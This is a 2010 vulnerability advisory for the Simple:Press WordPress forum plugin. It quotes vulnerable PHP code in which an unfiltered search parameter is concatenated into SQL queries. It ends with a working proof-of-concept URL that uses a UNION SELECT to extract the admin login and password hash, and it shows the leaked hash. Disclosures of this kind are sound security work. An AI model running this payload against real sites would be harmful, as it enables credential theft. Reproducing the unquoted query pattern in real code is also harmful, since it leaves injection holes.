The Enigma Group

Simple:Press WordPress Plugin 4.3.0 - SQL Injection Vulnerability


# Title: Simple:Press Wordpress Plugin SQL Injection Vulnerability

# Author: ADEO Security

# Published: 03/07/2010

# Version: v4.3.0 (Possible all versions)

# Vendor: http://simple-press.com

# Download: http://simple-press.com/download-manager.php?id=228



# Description: "Simple:Press – the feature rich, completely integrated

and fully scaleable forum plugin for WordPress.

Highly customisable, Simple:Press packs the features of a standalone

forum into a plugin – seamlessly turning your WordPress site into a

community."



# Credit: Vulnerability founded by Canberk BOLAT at ADEO Security Labs

        - Mail: security[AT]adeo.com.tr

        - Web: http://security.adeo.com.tr



# Vulnerability:

In the search field, search values not filtered and inserted into sql

queries without using any quotes/single quotes and Simple:Press

execute this sql queries.



sf-header-forum.php

---[snip]---

385        # Add Search Vars



386        if(isset($_GET['search']))



387        {



388            if($_GET['search'] != '') $sfvars['searchpage'] =

sf_esc_int($_GET['search']);



389            if(isset($_GET['value']) ? $sfvars['searchvalue'] =

stripslashes(urldecode($_GET['value'])) : $sfvars['searchvalue'] =

'');



390            if(isset($_GET['type']) ? $sfvars['searchtype'] =

sf_esc_int($_GET['type']) : $sfvars['searchtype'] = 1);



400            if(isset($_GET['include']) ? $sfvars['searchinclude'] =

sf_esc_int($_GET['include']) : $sfvars['searchinclude'] = 1);



401            if($sfvars['searchinclude'] == 0) $sfvars['searchinclude'] =1;



402            if($sfvars['searchtype'] == 0) $sfvars['searchtype'] =1;



403        } else {

---[snip]---



At the line 389, HTTP GET Request "value" defined as global variable

$sfvars['searchvalue'] with filtering functions that stripslashes()

and urldecode() but they can't secure it because in the

sf-database.php file the global variable $sfvar['searchvalue']

inserted into sql query without any quotes/single quotes.



sf-database.php

---[snip]---

...

401        $searchvalue=urldecode($sfvars['searchvalue']);



...



404        if($sfvars['searchtype'] == 6)



...



409            $ANDWHERE = " AND topic_status_flag=".$sfvars['searchvalue']." ";



410



411        } elseif($sfvars['searchtype'] == 8)



...



414            $userid = $sfvars['searchvalue'];



415            $SELECT = "SELECT SQL_CALC_FOUND_ROWS DISTINCT ";



416            $MATCH = "";



417            $ANDWHERE = " AND ".SFPOSTS.".user_id=".$userid." ";



418



419        } elseif($sfvars['searchtype'] == 9)



...



422            $userid = $sfvars['searchvalue'];

...



425            $ANDWHERE = " AND ".SFTOPICS.".user_id=".$userid." ";

...

---[snip]---



Its successfully exploitable with search types 6,8,9. Please see # PoC section.



# PoC:

Request: http://server/wordpress/?page_id=4/&forum=all&value=9999+union+select+(select+concat_ws(0x3a,user_login,user_pass)+from+wp_users+LIMIT+0,1)--+&type=9&search=1&searchpage=2



Response: Topics started by admin:$P$B9TLvhE1l2swasFRlOcABmbhZteCCo.

(0 Matches Found)



================================

Exploit-DB Notes:

================================

Tested platform:

* Ubuntu Linux version 2.6.32-22-generic (buildd@palmer) (gcc version 4.4.3 (Ubuntu 4.4.3-4ubuntu5) )

* PHP5 + Apache2 + Mysql

* Latest version of Wordpress

* Simple:Press version=v4.2.2  (as of 07/05/2010 vendor still provides v4.2.2)

* Settings: Magic_Quotes = off; Global variables = On